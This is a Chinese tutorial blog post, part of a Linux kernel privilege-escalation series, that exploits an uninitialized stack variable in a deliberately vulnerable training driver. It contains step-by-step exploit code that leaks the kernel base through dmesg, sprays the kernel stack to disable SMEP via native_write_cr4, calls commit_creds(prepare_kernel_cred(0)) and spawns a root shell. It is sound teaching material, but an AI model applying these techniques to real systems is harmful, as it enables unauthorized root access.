linux内核提权系列教程(3):栈变量未初始化漏洞

本文从我的先知转过来。
说明:实验所需的驱动源码、bzImage、cpio文件见我的github进行下载。本教程适合对漏洞提权有一定了解的同学阅读,具体可以看看我先知之前的文章,或者我的简书

一、 漏洞分析

1. 程序分析

总共两个驱动号,对应两个功能。

        case UNINITIALISED_STACK_ALLOC:
        {
            ret = copy_to_stack((char *)p_arg);
            break;
        }
        case UNINITIALISED_STACK_USE:
        {
            use_obj_args use_obj_arg;
            
            if(copy_from_user(&use_obj_arg, p_arg, sizeof(use_obj_args)))
                return -EINVAL;
            
            
            use_stack_obj(&use_obj_arg);
    
            break;
        }

第1个功能->UNINITIALISED_STACK_ALLOC

// 布置内核栈: 能往内核栈上传入4096字节的数据
#define BUFF_SIZE 4096
noinline static int copy_to_stack(char __user *user_buff)
    {
        int ret;
        char buff[BUFF_SIZE];

        ret = copy_from_user(buff, user_buff, BUFF_SIZE);
        buff[BUFF_SIZE - 1] = 0;

        return ret;
    }

第2个功能-> UNINITIALISED_STACK_USE

// 使用内核栈: 初始化内核栈数据
noinline static void use_stack_obj(use_obj_args *use_obj_arg)
    {
        volatile stack_obj s_obj; //volatile表示要求编译器不要对该变量作任何优化

        if(use_obj_arg->option == 0)
        {
            s_obj.fn = uninitialised_callback;
            s_obj.fn_arg = use_obj_arg->fn_arg;
        }

        s_obj.fn(s_obj.fn_arg);     

    }
// 结构
    typedef struct stack_obj 
    {
        int do_callback;
        long fn_arg;
        void (*fn)(long);
        char buff[48];
    }stack_obj;

    typedef struct use_obj_args
    {
        int option;
        long fn_arg;
    }use_obj_args;

2. 漏洞分析

漏洞:只有(use_obj_arg->option == 0)时,才会初始化stack_obj对象。

利用:构造(use_obj_arg->option != 0),产生内核栈变量未初始化引用错误。本驱动其实简化了漏洞利用过程,因为可以直接利用驱动号UNINITIALISED_STACK_ALLOC来布置内核栈,不需要考虑用系统调用来布置。


二、 漏洞利用

1. 利用步骤

完整代码见exp_uninitialised_stack.c

(1)单核执行
//step 1: 让程序只在单核上运行,以免只关闭了1个核的smep,却在另1个核上跑shell
void force_single_core()
{
    cpu_set_t mask;
    CPU_ZERO(&mask);
    CPU_SET(0,&mask);

    if (sched_setaffinity(0,sizeof(mask),&mask))
        printf("[-----] Error setting affinity to core0, continue anyway, exploit may fault \n");
    return;
}
(2)泄露内核基址
// step 2: 构造 page_fault 泄露kernel地址。从dmesg读取后写到/tmp/infoleak,再读出来
    pid_t pid=fork();
    if (pid==0){
        do_page_fault();
        exit(0);
    }
    int status;
    wait(&status);    // 等子进程结束
    //sleep(10);
    printf("[+] Begin to leak address by dmesg![+]\n");
    size_t kernel_base = get_info_leak()-sys_ioctl_offset;
    printf("[+] Kernel base addr : %p [+] \n", kernel_base);
(3)关闭smep

利用UNINITIALISED_STACK_ALLOC功能在内核栈上布置目标函数和所需参数,这样在发生栈变量未初始化使用时就会触发执行目标函数。

// step 3: 关闭smep
    char buf[4096];
    memset(buf, 0, sizeof(buf));
    struct use_obj_args use_obj={
        .option=1,
        .fn_arg=1337,
    };

    for (int i=0; i<4096; i+=16)
    {
        memcpy(buf+i, &fake_cr4, 8);   // 注意是fake_cr4所在地址
        memcpy(buf+i+8, &native_write_cr4_addr, 8);  // 注意是native_write_cr4_addr所在地址
    }
    ioctl(fd,UNINITIALISED_STACK_ALLOC, buf);
    ioctl(fd,UNINITIALISED_STACK_USE, &use_obj);
(4)提权—commit_creds(prepare_kernel_cred(0))
// step 4: 提权,执行get_root();  注意是把get_root()的地址拷贝过去,转一次
    size_t get_root_addr = &get_root;
    memset(buf, 0, sizeof(buf));
    for (int i=0; i<4096; i+=8)
        memcpy(buf+i, &get_root_addr, 8);

    ioctl(fd,UNINITIALISED_STACK_ALLOC, buf);
    ioctl(fd,UNINITIALISED_STACK_USE, &use_obj);
(5)返回shell
// step 5: 获得shell
    if (getuid()==0)
    {
        printf("[+] Congratulations! You get root shell !!! [+]\n");
        system("/bin/sh");
    }

2. 利用结果

成功提权:

1-exp_uninitialised_stack_succeed.png

参考:

https://invictus-security.blog/2017/06/

https://github.com/invictus-0x90/vulnerable_linux_driver

©著作权归作者所有,转载或内容合作请联系作者
  • 序言:七十年代末,一起剥皮案震惊了整个滨河市,随后出现的几起案子,更是在滨河造成了极大的恐慌,老刑警刘岩,带你破解...
    沈念sama阅读 211,948评论 6 492
  • 序言:滨河连续发生了三起死亡事件,死亡现场离奇诡异,居然都是意外死亡,警方通过查阅死者的电脑和手机,发现死者居然都...
    沈念sama阅读 90,371评论 3 385
  • 文/潘晓璐 我一进店门,熙熙楼的掌柜王于贵愁眉苦脸地迎上来,“玉大人,你说我怎么就摊上这事。” “怎么了?”我有些...
    开封第一讲书人阅读 157,490评论 0 348
  • 文/不坏的土叔 我叫张陵,是天一观的道长。 经常有香客问我,道长,这世上最难降的妖魔是什么? 我笑而不...
    开封第一讲书人阅读 56,521评论 1 284
  • 正文 为了忘掉前任,我火速办了婚礼,结果婚礼上,老公的妹妹穿的比我还像新娘。我一直安慰自己,他们只是感情好,可当我...
    茶点故事阅读 65,627评论 6 386
  • 文/花漫 我一把揭开白布。 她就那样静静地躺着,像睡着了一般。 火红的嫁衣衬着肌肤如雪。 梳的纹丝不乱的头发上,一...
    开封第一讲书人阅读 49,842评论 1 290
  • 那天,我揣着相机与录音,去河边找鬼。 笑死,一个胖子当着我的面吹牛,可吹牛的内容都是我干的。 我是一名探鬼主播,决...
    沈念sama阅读 38,997评论 3 408
  • 文/苍兰香墨 我猛地睁开眼,长吁一口气:“原来是场噩梦啊……” “哼!你这毒妇竟也来了?” 一声冷哼从身侧响起,我...
    开封第一讲书人阅读 37,741评论 0 268
  • 序言:老挝万荣一对情侣失踪,失踪者是张志新(化名)和其女友刘颖,没想到半个月后,有当地人在树林里发现了一具尸体,经...
    沈念sama阅读 44,203评论 1 303
  • 正文 独居荒郊野岭守林人离奇死亡,尸身上长有42处带血的脓包…… 初始之章·张勋 以下内容为张勋视角 年9月15日...
    茶点故事阅读 36,534评论 2 327
  • 正文 我和宋清朗相恋三年,在试婚纱的时候发现自己被绿了。 大学时的朋友给我发了我未婚夫和他白月光在一起吃饭的照片。...
    茶点故事阅读 38,673评论 1 341
  • 序言:一个原本活蹦乱跳的男人离奇死亡,死状恐怖,灵堂内的尸体忽然破棺而出,到底是诈尸还是另有隐情,我是刑警宁泽,带...
    沈念sama阅读 34,339评论 4 330
  • 正文 年R本政府宣布,位于F岛的核电站,受9级特大地震影响,放射性物质发生泄漏。R本人自食恶果不足惜,却给世界环境...
    茶点故事阅读 39,955评论 3 313
  • 文/蒙蒙 一、第九天 我趴在偏房一处隐蔽的房顶上张望。 院中可真热闹,春花似锦、人声如沸。这庄子的主人今日做“春日...
    开封第一讲书人阅读 30,770评论 0 21
  • 文/苍兰香墨 我抬头看了看天上的太阳。三九已至,却和暖如春,着一层夹袄步出监牢的瞬间,已是汗流浃背。 一阵脚步声响...
    开封第一讲书人阅读 32,000评论 1 266
  • 我被黑心中介骗来泰国打工, 没想到刚下飞机就差点儿被人妖公主榨干…… 1. 我叫王不留,地道东北人。 一个月前我还...
    沈念sama阅读 46,394评论 2 360
  • 正文 我出身青楼,却偏偏与公主长得像,于是被迫代替她去往敌国和亲。 传闻我的和亲对象是个残疾皇子,可洞房花烛夜当晚...
    茶点故事阅读 43,562评论 2 349

推荐阅读更多精彩内容